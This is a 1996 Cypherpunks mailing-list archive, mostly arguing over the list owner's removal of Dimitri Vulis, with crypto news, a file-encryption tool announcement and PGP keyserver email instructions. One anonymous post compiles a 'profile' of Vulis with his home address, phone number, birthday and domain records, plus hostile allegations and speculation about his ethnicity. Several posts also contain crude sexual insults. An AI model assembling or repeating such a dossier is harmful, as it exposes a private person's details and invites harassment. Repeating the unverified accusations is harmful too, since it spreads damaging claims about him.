To: bryce@digicash.com
Subject: Re: [NOISE] Re: Dr. Vulis
In-Reply-To: <199611050909.KAA00731@digicash.com>
Message-ID: <3280A752.2916@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Bryce wrote:
>  <hallam@ai.mit.edu>" typed:
> > Of course John was right to give Vilus the boot. Cypherpunks is a club
> > and like many private clubs occasionaly finds it necessary to give some
> > oik the boot.

> Yeah!  That was GREAT!  Now let's ban Dr. Hallam-Baker!  He's
> always pissing off the libertarianpunks and causing flamewars...

[snip]

> I have read (parts of) _On_Liberty_, and as I recall it was
> adamant in an ("unbalanced") defense of absolute rights of
> individuals.  The only exception I remember is an unexplored
> comment on rights-violations of ommission counting as well as
> rights-violations of commission.  (E.g. if you see a drowning
> man and you fail to save him you are violating his rights.)
> Perhaps that is what you see as "balance between the rights of
> communities and the rights of individuals"?  Or perhaps the
> book goes into detail on that subject in a part that I didn't
> read.  Again I ask not because I have a particular ideological
> axe to grind here, but because I seek accuracy in public dialogue.

Since we all start out as children, learning by imitation, and reasoning by comparison,
a valid argument can be made that our minds work best that way.  Certainly the wide
variety of opinion here shows that theory doesn't produce nearly the consensus that
real experience does.

Therefore I suggest that we look more at analogies, but try hard to make the analogies
more accurate.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 6 Nov 1996 03:59:42 -0800 (PST)
To: Sean Roach <cypherpunks@toad.com
Subject: Re: [rant] Re: Censorship on cypherpunks
Message-ID: <3.0b36.32.19961106070051.00f0fd14@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:44 PM 11/5/96 -0800, Sean Roach wrote:
>May I remind you that if you want to leave this country, all you have to do
>is board a plane.  Many people have suggested similar things about various
>groups for about two centuries.  The major difference between this list and
>this government is that it is easier to start a new list.

However since governments attempt to maintain a geographical monopoly and
there are a very limited number of them, it is not possible to find another
country you can enter as a matter of right so you may not be able to
escape.  In contrast there are millions of private organizations of various
sorts (corporations, etc) and it is trivial to find one to join if you like.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Wed, 6 Nov 1996 07:15:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: Vulis profileVulis profile
Message-ID: <199611061506.HAA17824@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


I had some free time this morning, and just for fun, thought I'd 
create a brief Net profile of our friend Dr. Vulis.  Here's what 
I found (sources included):

Dimitri Vulis
#4k Burns St, Forest Hills,NY 11375-3506
(718)261-6839
Source: http://www.yahoo.com (Four11 people search)

Birthday: December 29
Source: http://www.boutell.com/birthday.cgi/december/29

D&M Consulting Services (DM-DOM)
   67-67 Burns Street
   Forest Hills, NY 11375
   Domain Name: DM.COM
   Administrative Contact:
      Administration, PSINet Domain  (PDA4)  
psinet-domain-admin@PSI.COM
      (703) 904-4100
   Technical Contact, Zone Contact:
      Network Information and Support Center  (PSI-NISC)  
hostinfo@psi.com
      (518) 283-8860
   Record last updated on 31-Oct-96.
   Record created on 19-Jun-91.
   Domain servers in listed order:
   NS.PSI.NET                   192.33.4.10
   NS2.PSI.NET                  38.8.50.2
Source: InterNIC

Q: Who is Dimitri Vulis? 
A: Dimitri is an XSoviet immigrant who is enrolled (or used to be 
enrolled) in CUNY, and who is a computer professional involved 
i.a. in unicode matters. The realspace Dimitri is a polite person 
and a devoted family head.  It's cyberspace image is not nearly 
as nice, unfortunately. 

He harasses people all over the net with the most offensive sorts 
of messages, and uses dirty tricks to retaliate to the people who 
do get offended. Among his accomplished feats is a series of 
articles about cat-eating dogs posted to rec.pets.cats (which 
caused a wave of complaints and made him lost his CUNY account) ; 
a series of porno binaries with obscene comments about his 
opponents posted to math-related newsgroups (he lost another 
academic account, at fordham.edu, after this scandal); and a 
series of racist articles denigrating all aspects of romanian 
life and culture which used to haunt the romanian newsgroup for 
years. 

Of course most of his net.bile is spilled over his fellow 
XSoviets, particularly of Jewish origin (such as Michael 
Verbitsky, Boris Veytsman, Vlad Rutenberg or myself, as well as 
all Brighton Beach together); and a lot of stuff comes out from 
his alleged aliases in bwalk.dm.com, aol.com and fly.harvard.edu. 
Some of these aliases match the names of his opponents, as I 
already mentioned.  Sometimes not only the names but also 
addresses match (although paths don't). 

Dimitri Vulis also advertises the capabilities of his site for 
forging and cancelling articles. Sometimes he shrewdly comments 
articles of his own saying : "This article is most certainly 
forged, after all I spent a lot of time teaching you how to 
forge... but I nevertheless like this article's content". 
Source: 
http://www.math.harvard.edu/~verbit/scs/cranks/from-Shlomo.html
(much more there too)

AUTHOR PROFILE: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
510 articles posted between 1995/06/29 and 1996/11/02. 
71 % followups. 
Number of articles posted to individual newsgroups (slightly 
skewed by cross-postings): 
          132 misc.jobs.misc 
          67 news.admin.net-abuse.misc 
          67 news.groups 
          40 mail.cypherpunks 
          32 nyc.food 
          18 soc.culture.russian 
          13 news.admin.misc 
          12 nyc.general 
          10 news.admin.censorship 
          9 news.admin.policy 
          8 alt.censorship 
          7 alt.usenet.kooks 
          7 soc.culture.pakistan 
          6 alt.revenge 
          5 comp.os.ms-windows.nt.advocacy 
          5 soc.culture.soviet 
          4 alt.sex.plushies 
          4 sci.math 
          4 sci.physics 
          4 talk.politics.medicine 
          3 alt.folklore.computers 
          3 alt.security 
          3 comp.lang.ada 
          3 comp.security.misc 
          3 sci.crypt 
          2 alt.nocem.misc 
          2 alt.sci.physics.plutonium 
          2 aus.flame 
          2 comp.os.ms-windows.advocacy 
          2 comp.unix.advocacy 
          2 microsoft.public.netiquette 
          2 soc.culture.israel 
          1 alt.2600 
          1 alt.anonymous 
          1 alt.bible 
          1 alt.computer.consultants 
          1 alt.consumers.experiences 
          1 alt.fan.bill-gates 
          1 alt.fan.my-big-hairy-penis 
          1 alt.privacy 
          1 alt.shenanigans 
          1 alt.society.neutopia 
          1 aus.general 
          1 comp.ai 
          1 comp.mail.uucp 
          1 comp.os.ms-windows.nt.misc 
          1 comp.os.ms-windows.win95.setup 
          1 comp.sys.mac.advocacy 
          1 humanities.language.sanskrit 
          1 misc.entrepreneurs 
          1 misc.invest 
          1 news.newusers.questions 
          1 nj.misc 
          1 nyc.seminars 
          1 rec.humor 
          1 rec.motorcycles 
          1 sci.psychology.psychotherapy 
          1 soc.motss 
          1 tor.general 
Source: http://www.dejanews.com profile

Dimitri Vulis:
Contrib. post:
 whose obnoxious, derivative and not-very-funny Soviet emigre 
jokes from Brighton Beach were a weekly feature about a year ago 
on rec.humor . He ignored completely any requests to stop. 
Eventually he started getting flamed in demotic Russian-quite fun 
for those of us who could read it.
- Dan "And to think he felt it important enough to waste his two 
hours of daily connect time on it" Case
--
 so what _is_ the deal with vulis?  is "russian emigre" a 
codeword for "jew", or for "russian emigre", or for something 
else?  (if i recall correctly, minor and now somewhat reformed 
net.loon mikhail zeleny claimed rather convincingly that vulis's 
posts contained certain tell-tale phrases which are highly 
un-idiomatic in english ("dandruff-covered" was one of them, i 
think) which were dead giveaways of classic pathological russian 
anti-semitism.)  so is vulis russian?  an emigre?  a jew in some 
sense?  self-hating?  maybe a self-hating russian jewish emigre 
who hates only the jewish half of themself?  or maybe they hate 
the russian half too?  are they now or have they ever been, while 
residing in america, on the payroll of any branch of any soviet 
or russian government?  did they stop posting russian emigre 
jokes when the paychecks stopped coming?  are they a zhirinovsky 
supporter now?  the most recent messages posted by vulis
that i have seen seem designed mainly to convince people that 
both zhirinovsky and valery fabrikant are (russian?) jews.  (it's 
very likely true in fabrikant's case, at least.)  maybe vulis is 
a self-hating supporter of zhirinovsky and fabrikant?
--
Posts on soc.culture.soviet, and is apparently something of an 
institution there; likes to stir things up, and to flame and/or 
troll people. I'm not up on which sides are good and/or bad on 
s.c.s, which among other things seems to have been ravaged by 
Serdar Argic for a long time as well, driving away many
of the gentler posters. Is currently engaged in flamewar with 
Peter V. Vorobieff there. Posts from dlv@CUNYVMS1.GC.CUNY.EDU 
(Dimitri Vulis, CUNY GC Math).
Source: 
http://www.math.uiuc.edu/~tskirvin/home/legends/legends3.html

Dimitri Vulis's barcode font
ftp: ctan: tex-archive/fonts/barcodes/barcodes.mf
There is a mailing list, rustex-l, for discussion of typesetting
Cyrilic-based languages.  To subscribe, send mail to 
listserv@ubvm.bitnet
containing the text
 SUBSCRIBE RUSTEX-L <your name here>
or mail Dimitri Vulis, DLV%CUNYVMS1.BITNET@cunyvm.cuny.edu [or 
dlv@dm.com?]
Source: http://wsspinfo.cern.ch/faq/fonts-faq/metafont-list

Bar code fonts  ymir.claremont.edu      by Dimitri Vulis 
[anonymous.tex.mf]
BibTeX eedsp.gatech.edu for MS-DOS  v99 by J. Demel and Dimitri 
Vulis
Source: 
http://www.clinet.fi/pd/doc/texts/TeX-FAQ-supplement_(part_2_of_3
)
(this FAQ is dated 10 May 93)

Server The files of type para used in the index were: 
/u3/wais/mirror/cissites/cissites.txt A list of contacts for most 
known organizations in the former Soviet Union who either have or 
plan to have e-mail connections. Provided by the SUEARN-L list, 
SUEARN-L@UBVM.BITNET. Keywords: USSR, CIS, Russia, Latvia, 
Lithuania, Estonia, Baltic, Moscow, Leningrad, Siberia. The 
original document is stored on 
impaqt.drexel.edu:/pub/suearn/misc/cissites.txt and is available 
for anonymous FTP. 
>From the front matter: * The Authoritative Soviet E-Mail 
Directory and Guide ** For more information, subscribe to the 
SUEARN-L mailing list, or send e-mail to Michael Meystel or 
Dimitri Vulis (c) 1992 All rights reserved 
This file contains contact information (correct name / address / 
phone / fax #... possibly e-mail address) for sites of interest 
in the Commonwealth of Independent States (CIS). We occasionally 
get asked questions like 'What is the Russian name of IAS?' or 
'What is the postal address of St. Petersburg State U's math 
faculty?' or 'What does IPPI stand for?'. Over the years I've 
collected a fairly complete electronic address book of addresses 
of Soviet sites where mathematical research is done, which I 
gladly share. Sergej Gelfand and Don Parsons have kindly 
contributed their address lists (respectively, more math and 
oncology). An even more complete version of such file, listing 
sites of possible interest to people in other fields, and freely 
available on the Internet, would be very useful to many. Please 
send additions, corrections, suggestions, etc to: CISMAP@DM.COM I 
can't acknowledge everything, but I will try to read every 
e-mail. Dimitri Vulis ) 
Source: http://www.elvis.ru/wais/c.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Wed, 6 Nov 1996 05:45:28 -0800 (PST)
To: hallam@ai.mit.edu
Subject: Re: Dr. Vulis
In-Reply-To: <9611052049.AA09638@etna.ai.mit.edu>
Message-ID: <961106.070903.3l3.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, hallam@ai.mit.edu writes:

> Laws create rights      - argument in "is"

This is way too broad.  The only "rights" laws can _create_ are the
zero-sum rights of entitlement that impose a corresponding
responsibility on others.  Natural rights can't be created by fiat.
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
DNRC Minister Plenipotentiary of All Things Confusing, Software Division
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMoCPLBvikii9febJAQEnBwQAorQEvRmmByqhVaT36RH3o7J/eB3GBPl2
//F1eydnxifDtKNJZ318se2E53fei0dVUHCTnHziP5ZLzZeKHsQxmBY6e8iwG+Pv
dvZ2GjZw1SKiyMML1HQtAo1pgATcSPocBXwNpwRsxm2bYSOe3IpFqHLT+TlZLxBJ
2d3dP2IB2qw=
=sP9G
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 6 Nov 1996 04:59:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Dr. Vulis is not on cypherpunks any more
In-Reply-To: <847122169.8851.0@fatmans.demon.co.uk>
Message-ID: <9m2ywD22w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


paul@fatmans.demon.co.uk writes:
>
> You also seem to be implying that people need protecting from
> Dimitri, much the same authoritarian argument we hear from govt.
> about people needing to be protected from porn/drugs/free spech etc.

A very good observation. The 'net needs John Gilmore and Chris Lewis
to protect the newbies from the unsuitable writings of Dr. Dimitri Vulis,
from commercial ads, and from strong crypto in civilian hands. :-)

What do you think about the following conjecture: "cypherpunks" was a
troll, set up to waste the time of the crypto-clueful people who might
otherwise develop good free crypto software.

> > Nor do they have any way of know what an
> > abberation his sort of behavior is on this list.  "So this is
> > what Cypherpunks are like," would be a sad, but understandable
> > misinterpretation of what we're all about.  What John did was
> > appropriate.

It's appropriate for the list owner to do almost anything he likes with his
mailing list: shut it down, unsubscribe people from it, filter out certain
people s/he doesn't like, to cause unsubscription instructions to be appended
to every broadcast article (some lists do that), to cause special disclaimers
to be appended to certain perople's submissions, etc. However subscribing
people to a mailing list without their asking for it has been viewed as
net-abuse for many years, a variant of sending out unsolicited e-mail.

A list owner _often has to unsubscribe addresses that have ceased to exist,
whose former owners hadn't bothered to unsubscribe, and whose e-mail bounces
back to the owner. I think John's actions should be viewed not in the
framework of his propoerty rights (no one argues with those, I hope), but
in terms of his credibility - of which he has none left.

> I understand the point here but I suggest a note at the top of the
> "welcome to cypherpunks" note every new subscriber gets explaining
> who Dimitri is and how to set up their mailer software to block his
> posts.

An excellet suggestion! John certainly has the right to do this on the
mailing list he owns. I also believe that a woman owns her body and
that prostitution should be decriminalized. A whore should have the right
to stand on a streetcorner with a big sign saying "Let me suck your cock
for $10". I have the right to respect her more than John.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kb4vwa@juno.com (Edward R. Figueroa)
Date: Wed, 6 Nov 1996 04:28:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: Parents effectively lose their right
Message-ID: <19961106.073225.9807.2.kb4vwa@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Family Research Council Washington Watch News - October 25, 1996 - Vol.
8:1

"Parents effectively lose their right to direct the upbringing of their
children when they drop them off at school, according to one federal
court judge.  Earlier this year, Judge Melinda Harmon, appointed by
President Bush, ruled that Katy Independent School District in TX did
not violate parents' rights by allowing Child Protective Services to interrogate a student without notifying his parents, nor by instructing him
to lie to his parents about the incident."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 6 Nov 1996 04:40:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: SEC_ure
Message-ID: <1.5.4.32.19961106123912.006814cc@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


 11-04-96.

 "Web security threat grows"

 With a variety of new technologies like stronger encryption,
 smart cards and digital signatures and envelopes emerging to
 tighten Web security, experts working on various aspects of the
 problem agree the goal of end-to-end security on the Web will
 remain elusive as long as insecure operating systems dominate
 the commercial market. "You can't build security on top of
 insecurity," said Netscape's Jim Roskind, who spent much of a
 session on Webware fending off criticism of Java security flaws.
 "We have to assume that the [security] problems will be 
 pervasive forever," warned Peter Neumann. "This is a holistic 
 problem, and we have to deal with it in a global way."


 "Protection sought for U.S. systems"

 The initiative will be led by the Pentagon's Computer Emergency
 Response Team at Carnegie Mellon University and the Energy
 Department's Computer Incident Advisory Capability.


 "Motorola unveils chip for contactless smart card"

 One chip designing a contactless card that meets all
 frequencies of a proposed standard while the other adds
 cryptography to a single-chip solution.
 The other card incorporates a 1,024-bit modular encryption
 processor that is reportedly one of the fastest in the industry.


 "U.S.Joint Venture to Market Acoustic Smart Card Technology"

 NeTegrity also announced it has invested $1 million in Encotone,
 Ltd., for a 10% equity interest in the Israeli company. Other
 Encotone, Ltd. investors include ECI Telecom, a $500 million
 Israeli telecommunications firm, and Professor Michal Ben Or,
 Head of the Department of Computer Science at Hebrew
 University of Jerusalem and a worldwide authority on cryptology.


 "Microchip Technology launches highly secure smart card family 
 with KEELOQ code hopping technology"

 The SCS152 provides a programmable 64-bit cryptographic key
 used to create a digital signature unique to each card, which
 reduces the possibility of unwanted access to card information
 and the "cloning" of these cards for unauthorized payments.
 Other features include programmable user memory and
 "anti-tearing," which prevents the information in the card from
 being corrupted if the supply voltage is interrupted.


 "EEMA Lobbies Over Limiting US Encryption Controls"

 EEMA recognizes that the principal reasons for this is the
 disparate European legislation that surrounds the use of
 encryption, and the fact that inter-working with dominant
 US-based computer software -- operating system and application
 software -- is subject to US legislation and restrictions.


 "Putting EDI to the test"

 Security continues to be the main sticking point for using the Net
 as a vehicle for EDI. Vendors that will demonstrate secure 
 E-mail messages transporting EDI documents over the Web.
 The technology used is S/MIME, an encrypted version of the
 popular MIME protocol.


 "V-One Secures New Clients"

 NSA runs the nation's code-breaking operations, and DISA is
 supposed to keep the nation's networks secure, so there is not
 much chance of finding out what they do with the software they
 have bought from V-One.

 -----

 http://jya.com/secure.txt  (28 kb)

 SEC_ure






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 6 Nov 1996 08:24:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Censorship on cypherpunks
In-Reply-To: <Pine.3.89.9611050119.A27459-0100000@netcom>
Message-ID: <BP3ywD23w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


furballs <furballs@netcom.com> writes:
> As for the original point on Vulis:
>
> John Gimore did what he did. Vulis challenged him, and John called his
> bluff. Having read this list for quite a while now, I've seen alot of
> crap go back and forth from many people that was just as annoying as what
> Vulis was doing.

I'm slightly offended by this.  What if someone were to post the entire text
of the _Pink _Swastika to this mailing list, in 40K chunks, with the subject
header "John Gilmore and Hitler's rise to power"? :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Fricker <jfricker@vertexgroup.com>
Date: Wed, 6 Nov 1996 08:07:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Protecting Your Data With Crypto
Message-ID: <19961106160652570.AAA136@dev.vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


Windows 95 and Windows NT users: after a couple sleepless nights I have created a mini-front end for ciphering files with Blowfish. This is an alpha version so I'm looking for bugs, feedbacks and feature creep. 

Read all about it at http://www.program.com/FileCipher/

and let me know what you think!

thanks etc, and happy encipheration!
--j

>John Young (jya@pipeline.com) said something about Protecting Your Data With Crypto on or about 11/5/96 1:45 AM

>We have put the November UNIX Review article Peter cited
>in his letter to the editor, "Protecting Your Data With Cryptography," 
>at:
>
>     http://jya.com/protect.htm
>
>

--j
-----------------------------------
| John Fricker (jfricker@vertexgroup.com)
| -random notes-
| My PGP public key is available by sending mail with subject "send pgp key".
| www.Program.com is a good programmer web site.
-----------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: C Matthew Curtin <cmcurtin@research.megasoft.com>
Date: Wed, 6 Nov 1996 05:23:34 -0800 (PST)
To: kb4vwa@juno.com (Edward R. Figueroa)
Subject: Re: Information
In-Reply-To: <19961105.131710.5207.1.kb4vwa@juno.com>
Message-ID: <199611061316.IAA03157@goffette.research.megasoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Ed" == Edward R Figueroa <kb4vwa@juno.com> writes:

Ed> I'm a new Cyberpunk!  I apologized if this is not the place to
Ed> post this message request.

It isn't.

This is cypherpunks, not cyberpunks.

Ed> I would like to know where to place my Public Key?  Note, I only
Ed> have E-mail access at this time, and not the Net access, but could
Ed> have a friend place the key for me.

http://www-swiss.ai.mit.edu/~bal/pks-toplev.html

Since you're email only, I'll humor you, and put the entire text of
the instructions to the email interface to the PGP keyserver at the
bottom of my message.

Ed> Last, I would like to know once and for all, is PGP compromised,
Ed> is there a back door, and have we been fooled by NSA to believe
Ed> it's secure?

No.

------------------------- begin instructions -------------------------
Using the E-mail interface to the keyserver

Using the E-mail interface to the keyserver
------------------------------------------------------------------------------

[ Norwegian: For aa faa dette dokumentet paa norsk, send "HELP NO" til
             pgp-public-keys@keys.no.pgp.net
  German:    Fuer eine deutschsprachige Fassung dieses Textes senden Sie
             eine Mail mit dem Subject "HELP DE" an die folgende Adresse
             pgp-public-keys@keys.de.pgp.net
]

PGP Public Email Keyservers
---------------------------

There are PGP public email key servers which allow one to exchange public
keys running using the Internet and UUCP mail systems.
Those capable of accessing the WWW might prefer to use the WWW interface
available via http://www.pgp.net/pgp/www-key.html and managers of sites
which may want to make frequent lookups may care to copy the full keyring
from the FTP server at ftp.pgp.net:pub/pgp/

This service exists only to help transfer keys between PGP users.
It does NOT attempt to guarantee that a key is a valid key;
use the signatures on a key for that kind of security.

Each keyserver processes requests in the form of mail messages.
The commands for the server are entered on the Subject: line.
---------------------------------------------- ======== -----
Note that they should NOT be included in the body of the message.
--------------------- === ---------------------------------------

        To: pgp-public-keys@keys.pgp.net
        From: johndoe@some.site.edu
        Subject: help

Sending your key to ONE server is enough.  After it processes your
key, it will forward your add request to other servers automagically.

For example, to add your key to the keyserver, or to update your key if it
is already there, send a message similar to the following to any server:

        To: pgp-public-keys@keys.pgp.net
        From: johndoe@some.site.edu
        Subject: add

        -----BEGIN PGP PUBLIC KEY BLOCK-----
        Version: 2.6

        
        -----END PGP PUBLIC KEY BLOCK-----

COMPROMISED KEYS:  Create a Key Revocation Certificate (read the PGP
docs on how to do that) and mail your key to the server once again,
with the ADD command.

Valid commands are:

Command                Message body contains
---------------------- -------------------------------------------------
ADD                    Your PGP public key (key to add is body of msg)
INDEX                  List all PGP keys the server knows about (-kv)
VERBOSE INDEX          List all PGP keys, verbose format (-kvv)
GET                    Get the whole public key ring (split)
GET userid             Get just that one key
MGET regexp            Get all keys which match /regexp/
                       regexp must be at least two characters long
LAST days              Get the keys updated in the last `days' days
------------------------------------------------------------------------

Examples for the MGET command:

        MGET michael            Gets all keys which have "michael" in them
        MGET iastate            All keys which contain "iastate"
        MGET E8F605A5|5F3E38F5  Those two keyid's

One word about regexps:  These are not the same as the wildcards Unix
shells and MSDOS uses.  A * isn't ``match anything'' it means ``match
zero or more of the previous character'' like:

	a.*  matches anything beginning with an a
	ab*c matches ac, abc, abbc, etc.

Just try not to use ``MGET .*'' -- use ``GET'' instead.

Note on the ``GET'' command: If at all possible, ftp the keyring from a
server such as ftp.pgp.net:pub/pgp/keys rather than using the ``GET''
command to return the whole ring.  Currently, this ring comes out to be
over 50 files of 52k each.  This is a lot of files, and a lot of bother
to get in the right order to run through PGP.


Users should normally use the email address `pgp-public-keys@keys.pgp.net'
or your national servers using one of:
	pgp-public-keys@keys.de.pgp.net
	pgp-public-keys@keys.nl.pgp.net
	pgp-public-keys@keys.no.pgp.net
	pgp-public-keys@keys.uk.pgp.net
	pgp-public-keys@keys.us.pgp.net
for the email interface, and `ftp.pgp.net:pub/pgp/' for FTP access.


Users are recommended to use the "*.pgp.net" addresses above as these
are stable and reliable.

-------------------------------- end ---------------------------------

-- 
Matt Curtin  cmcurtin@research.megasoft.com  Megasoft, Inc   Chief Scientist
http://www.research.megasoft.com/people/cmcurtin/   I speak only for myself.
Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Lesher / hated by RBOC's in 5 states" <wb8foz@wauug.erols.com>
Date: Wed, 6 Nov 1996 05:43:21 -0800 (PST)
To: frissell@panix.com (Duncan Frissell)
Subject: Re: Exon's Seat Lost
In-Reply-To: <3.0b36.32.19961105212020.0073e520@panix.com>
Message-ID: <199611061343.IAA13821@wauug.erols.com>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell sez:
> 
> Exon's seat goes to Republicans (according to ABC).  CDA probably not involved.

Did I not hear Pressler lost?


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 6 Nov 1996 08:25:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Censorship on cypherpunks
In-Reply-To: <199611060510.XAA11348@smoke.suba.com>
Message-ID: <D86ywD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


snow <snow@smoke.suba.com> writes:

>     Let's also not confuse "capricious plug-pulling" with _daring_ the OWNER
> of the machine the list is running on, and THE GUY WHO RUNS THE LIST to kick
> your sorry racist ass off the list. He called your bluff, and any day now,
> I expect him to prevent you from even posting in your own name. Not that that

Unfortunately, such actions would be consistent with John's other recent
acts of censorship.  I find it regrettable, since I used to have a lot of
respect for him.

But of course he's within his rights to ruin his own credibility.

As for "racist", I think this label is more applicable not to me, but to
the individual who characterized a group of (then) subscribers to this
list as "crazy Russians".

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 6 Nov 1996 08:20:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [NOISE] Censorship of Dr. Vulius
In-Reply-To: <Pine.SUN.3.94.961105192617.27527A-100000@polaris>
Message-ID: <Pe7ywD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn <unicorn@schloss.li> writes:

> Oh, shut up and go away.
> No one wants to hear from you anymore.

Will someone please teach Uni how to use procmail or a similar program to
filter out my politically incorrect rants?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Genocide <gen2600@aracnet.com>
Date: Wed, 6 Nov 1996 09:07:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Dr. Vulis
In-Reply-To: <Pine.SUN.3.91.961105120912.17274B-100000@crl.crl.com>
Message-ID: <Pine.LNX.3.95.961106090652.13663A-100000@shelob.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain



	Whats done is done, why don't we move on?


G
============================================================================

Email:
gen2600@aracnet.com
					   Available on the web:
Beeper: (503) 204-3606
					Http://www.aracnet.com/~gen2600


Something I've been known to babble in my sleep:

   It is by caffeine alone that I set my mind in motion.
   It is by the Mountain Dew that the thoughts acquire speed,
   the lips acquire stains, the stains become a warning.
   It is by caffeine alone that I set my mind in motion.

============================================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 6 Nov 1996 08:30:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [NOISE] Censorship of Dr. Vulius
In-Reply-To: <2.2.32.19961105063515.006c9fa4@gonzo.wolfenet.com>
Message-ID: <Bm7ywD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Cerridwyn Llewyellyn <ceridwyn@wolfenet.com> writes:

> At 10:00 AM 11/4/96 -0500, you wrote:
> >someone abuses that priveledge they may lose it. Plain and simple.  It is
> >also worthy to note that the Right to Free Speech, etc. applies to the
> >government (IOW, the government can not hinder the right to free speech so
> >long as that speech does not infringe upon someone else's right.  Since when
> >is this list government run?  The decision was apparently a personal one.
> 
> I don't think anyone has argued that the owner of the list doesn't have the
> right to remove people from it.  However, simply because he has the right to
> doesn't mean he should, and it also doesn't mean other members can't or
> shouldn't argue that he made a bad decision (unless, of course, the dissentin
> members are removed as well.)  Many, if not most, members believe the list
> should be run in a non-authoritarian manner (whoever argued that the term
> authoritarian applies only to governments is wrong.  the difference is a pers
> has the right to act in an authoritarian manner over his own property whereas
> a government doesn't have that right over it's citizens.  Again, however,
> having 
> the right doesn't necessarily make it "okay").  

John has the right to practice censorship on his mailing list, and he's just
exercised his right. He also has the right to burn all the books he owns.

Someone mentioned the speech codes at private universities as examples of 
censorship. Again, they have the right to do that, and they may or may not
jeopardise their credibility. As Alan Derschowitz pointed out, when Harvard
claims to be a bastiod of academic freedom while at the same time outlawing
"politically correct" speech, it's neither a criminal act nor a tort, they
simply lose their credibility. Likewise Brigham Young University claims to
follow the teachings of ASmith & Young, not John Stuart Mills. They would
damage their credibility if they did _not restrict certain kinds of speech
and activities, such as gay-and-lesbian organizations paid for with student
activity fees.

BYU's words and actions are consistent, while John Gilmore's are not.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 6 Nov 1996 09:31:07 -0800 (PST)
To: Dave Crocker <dcrocker@brandenburg.com>
Subject: Re: Dr. Vulis is not on cypherpunks any more
In-Reply-To: <v0310061baea578d1263f@[205.214.160.146]>
Message-ID: <Pine.SUN.3.91.961106085914.3111A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
